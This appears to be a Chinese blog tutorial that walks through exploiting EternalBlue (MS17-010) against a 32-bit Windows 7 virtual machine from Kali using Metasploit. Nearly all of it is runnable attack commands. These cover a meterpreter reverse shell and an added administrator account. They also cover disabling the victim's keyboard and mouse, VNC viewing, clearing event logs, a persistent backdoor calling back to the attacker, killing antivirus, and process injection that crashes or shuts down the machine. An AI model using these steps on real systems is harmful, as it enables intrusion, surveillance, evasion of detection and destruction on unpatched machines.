利用永恒之蓝(MS17-010)拿到电脑win7(32位)权限(包含:开关键盘/鼠标,文件上传,开启的远程桌面,使用摄像头拍照,重新启动计算机,关闭防护软件,取消户登录,电脑蓝屏等等......)
免责声明:
严禁利用本文章中所提到的虚拟机和技术进行非法攻击,否则后果自负,上传者不承担任何责任。
Kali2021(链接:https://pan.baidu.com/s/1jzaqjiEQVEHQdRRIp72f3Q
提取码:tian )
Win7 (32)(链接:https://pan.baidu.com/s/1r7Y3jA4hfb4sTKKh0ubNIw
提取码:tian )
实验均为本地虚拟机(kali:192.168.0.114)(win7(32位):192.168.0.115)
文件:Eternalblue-Doublepulsar-Metasploit-master
(链接:https://pan.baidu.com/s/1MTQaSOrRSrFw_eWmnyr8Dw
提取码:tian )
第一步:下载 Eternalblue-Doublepulsar-Metasploit-master ,将其解压放到root目录下重新命名为 Eternalblue-Doublepulsar-Metasploit
第二步:把 Eternalblue-Doublepulsar-Metasploit 文件中的 ternalblue_doublepulsar.rb
拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb
命令顺序:
(1)cd Eternalblue-Doublepulsar-Metasploit-master #cd是切换文件目录
(2)cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb #拷贝
(3)cd /usr/share/metasploit-framework/modules/exploits/windows/smb #切换文件目录
第三步:然后在 cd /usr/share/metasploit-framework/modules/exploits/windows/smb目录下(安装win 32架构)
命令:dpkg --add-architecture i386 && apt-get update && apt-get install wine32
安装过程中可能时间比较长,耐心等候.
安装过程中的问题:(1)选择<NO> (2)选择cron
第四步:运行 wine -h
第五步:然后再运行 postgresql 数据库
命令:service postgresql start
第六步:打开 msfconsole
第七步:使用 exploit 模块
命令顺序:
(1)use exploit/windows/smb/eternalblue_doublepulsar #使用模块
(2)set payload windows/meterpreter/reverse_tcp #设置payload
(3)show options #查看模块信息
(4)set rhosts 192.168.0.115 #要攻击的受害电脑地址(win7)
(5)set lhost 192.168.0.114 #本地的kali地址
方法1:
(6)set processinject explorer.exe #设置进程注入进入命令行下
(7)run #攻击
(8)execute -H -i -f cmd.exe #可以进到受害电脑的命令行下
但你想查看ip地址等信息时出现乱码:
(9)输入:chcp 65001
(10)切换到受害电脑桌面:cd c:\users\administrator\desktop
将kali里的文件上传文件到受害电脑上:echo > 文件名
受害电脑的效果:
(11)添加用户名密码
命令的使用:net user 用户名 密码 /add
命令的使用:net localgroup Administrators 用户名 /add
命令:net user tian3 123456 /add
命令:net localgroup Administrators tian3 /add
(12)输入:exit 可以退到 meterpreter
(13)#开关受害电脑键盘/鼠标:uictl
#开启或禁止键盘/鼠标:uictl [enable/disable] [keyboard/mouse/all]
#禁用鼠标: uictl disable mouse
#禁用键盘: uictl disable keyboard
此时受害电脑的鼠标已被禁用
开启已被禁用的鼠标
此时受害电脑的键盘已被禁用
开启已被禁用的键盘
(13)#开启受害电脑的远程桌面:run vnc
可以看到受害电脑做干什么.
(14)#重新启动受害电脑的计算机:reboot
受害电脑的效果:
(15)#清除事件日志:clearev
(16)植入后门 : run persistence -X -i 5 -p 4444 -r 192.168.0.114
-X 在目标主机上开机自启动
-i 不断尝试反向连接的时间间隔
-r kali的地址
(17)关闭防护软件:run killav
方法2:
(6)set processinject lsass.exe —设置进程注入后1分钟受害电脑关机
受害电脑的效果:
方法3:
(6)set processinject winlogon.exe --设置进程注入取消受害电脑用户登录
受害电脑的效果:
方法4:
(6)set processinject wininit.exe --设置进程注入受害电脑蓝屏
受害电脑的效果:
参考链接:利用MS17-010渗透win7(32位)_1stPeak's Blog-CSDN博客_永恒之蓝32位利用